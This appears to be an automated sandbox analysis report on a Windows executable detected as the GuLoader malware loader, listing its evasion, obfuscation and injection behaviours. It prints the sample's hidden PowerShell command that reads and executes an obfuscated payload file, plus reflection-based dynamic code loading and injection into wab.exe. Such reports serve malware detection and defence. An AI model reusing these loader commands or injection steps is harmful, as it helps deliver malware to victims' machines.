Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Q20240425 MAX5073626.com.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbMn source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5O source: powershell.exe, 00000001.00000002.2185997052.0000000002CB1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lambda_methodCore.pdbt/ source: powershell.exe, 00000001.00000002.2195123404.00000000083B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2191279426.0000000007152000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.2195976842.000000000A319000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Frakkelommes $Recirkuleringers $Noting), (Discoloring @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Brainard = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Fusel)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Bidragsberettigedes, $false).DefineType($Overdriven
Obfuscated command line found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" Jump to behavior
Suspicious powershell command line found
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)"
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -windowstyle hidden "$Annotationerne139=cat 'C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta';$Rhinocerotiform=$Annotationerne139.substring(32760,3);.$Rhinocerotiform($Annotationerne139)" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D43895 push cs; ret 1_2_08D438C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4E0B6 push esp; ret 1_2_08D4E0B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4D861 push 34977B93h; iretd 1_2_08D4D89C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4CC01 push cs; ret 1_2_08D4CC10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4B9DD push esi; ret 1_2_08D4B9DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4AD72 push cs; ret 1_2_08D4AD88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D45A98 push ebx; retf 1_2_08D45AA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4AAA0 push ecx; retf 1_2_08D4AACB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D45252 push ebx; iretd 1_2_08D45253
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4AA79 push cs; ret 1_2_08D4AA7C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4DE0B pushad ; ret 1_2_08D4DE19
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4AE3D push cs; ret 1_2_08D4AE40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D4576E push es; retf 1_2_08D45774
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08D45306 push es; retf 1_2_08D45308
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6B9DD push esi; ret 7_2_03E6B9DE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6576E push es; retf 7_2_03E65774
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6AD72 push cs; ret 7_2_03E6AD88
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E65306 push es; retf 7_2_03E65308
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6AAA0 push ecx; retf 7_2_03E6AACB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6E0B6 push esp; ret 7_2_03E6E0B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E63895 push cs; ret 7_2_03E638C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E65A98 push ebx; retf 7_2_03E65AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6D861 push 34977B93h; iretd 7_2_03E6D89C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6AA79 push cs; ret 7_2_03E6AA7C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E65252 push ebx; iretd 7_2_03E65253
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6AE3D push cs; ret 7_2_03E6AE40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6CC01 push cs; ret 7_2_03E6CC10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 7_2_03E6DE0B pushad ; ret 7_2_03E6DE19
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe Jump to dropped file
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6645 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3197 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3490 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 6181 Jump to behavior
Found evaded block containing many API calls
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Evaded block: after key decision
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5064 Thread sleep count: 3490 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596 Thread sleep time: -93000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596 Thread sleep count: 6181 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6596 Thread sleep time: -18543000s >= -30000s Jump to behavior
Sleep loop found (likely to delay execution)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 3490 delay: -5 Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_00402B75 FindFirstFileW, 0_2_00402B75
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_0040673F GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040673F
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe Code function: 0_2_004065F5 FindFirstFileW,FindClose, 0_2_004065F5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: wab.exe, 00000007.00000002.2923725946.0000000006D88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWXM
Source: wab.exe, 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_04627801 LdrInitializeThunk, 1_2_04627801
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 29CFAC8 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
